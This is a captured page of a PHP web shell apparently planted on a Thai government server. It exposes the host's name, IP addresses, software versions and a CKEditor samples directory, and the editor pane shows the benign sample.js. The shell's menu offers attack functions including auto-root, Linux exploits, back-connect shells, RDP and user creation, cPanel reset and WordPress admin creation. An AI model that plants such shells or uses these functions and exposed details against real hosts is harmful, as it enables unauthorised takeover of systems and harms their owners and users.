Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
amss /
include /
ckeditor /
samples /
old /
[ HOME SHELL ]
Name
Size
Permission
Action
assets
[ DIR ]
drwxr-xr-x
dialog
[ DIR ]
drwxr-xr-x
enterkey
[ DIR ]
drwxr-xr-x
htmlwriter
[ DIR ]
drwxr-xr-x
magicline
[ DIR ]
drwxr-xr-x
toolbar
[ DIR ]
drwxr-xr-x
wysiwygarea
[ DIR ]
drwxr-xr-x
ajax.html
2.56
KB
-rw-r--r--
api.html
6.81
KB
-rw-r--r--
appendto.html
2.15
KB
-rw-r--r--
datafiltering.html
45.82
KB
-rw-r--r--
divreplace.html
4.42
KB
-rw-r--r--
index.html
5.52
KB
-rw-r--r--
inlineall.html
9.65
KB
-rw-r--r--
inlinebycode.html
5.92
KB
-rw-r--r--
inlinetextarea.html
4.69
KB
-rw-r--r--
jquery.html
7.23
KB
-rw-r--r--
readonly.html
2.74
KB
-rw-r--r--
replacebyclass.html
6.79
KB
-rw-r--r--
replacebycode.html
6.69
KB
-rw-r--r--
sample.css
4.97
KB
-rw-r--r--
sample.js
1.64
KB
-rw-r--r--
sample_posteddata.php
789
B
-rw-r--r--
tabindex.html
2.27
KB
-rw-r--r--
uicolor.html
2.47
KB
-rw-r--r--
uilanguages.html
4.27
KB
-rw-r--r--
xhtmlstyle.html
6.63
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : sample.js
/** * Copyright (c) 2003-2016, CKSource - Frederico Knabben. All rights reserved. * For licensing, see LICENSE.md or http://ckeditor.com/license */ // Tool scripts for the sample pages. // This file can be ignored and is not required to make use of CKEditor. ( function() { CKEDITOR.on( 'instanceReady', function( ev ) { // Check for sample compliance. var editor = ev.editor, meta = CKEDITOR.document.$.getElementsByName( 'ckeditor-sample-required-plugins' ), requires = meta.length ? CKEDITOR.dom.element.get( meta[ 0 ] ).getAttribute( 'content' ).split( ',' ) : [], missing = [], i; if ( requires.length ) { for ( i = 0; i < requires.length; i++ ) { if ( !editor.plugins[ requires[ i ] ] ) missing.push( '<code>' + requires[ i ] + '</code>' ); } if ( missing.length ) { var warn = CKEDITOR.dom.element.createFromHtml( '<div class="warning">' + '<span>To fully experience this demo, the ' + missing.join( ', ' ) + ' plugin' + ( missing.length > 1 ? 's are' : ' is' ) + ' required.</span>' + '</div>' ); warn.insertBefore( editor.container ); } } // Set icons. var doc = new CKEDITOR.dom.document( document ), icons = doc.find( '.button_icon' ); for ( i = 0; i < icons.count(); i++ ) { var icon = icons.getItem( i ), name = icon.getAttribute( 'data-icon' ), style = CKEDITOR.skin.getIconStyle( name, ( CKEDITOR.lang.dir == 'rtl' ) ); icon.addClass( 'cke_button_icon' ); icon.addClass( 'cke_button__' + name + '_icon' ); icon.setAttribute( 'style', style ); icon.setStyle( 'float', 'none' ); } } ); } )();
Close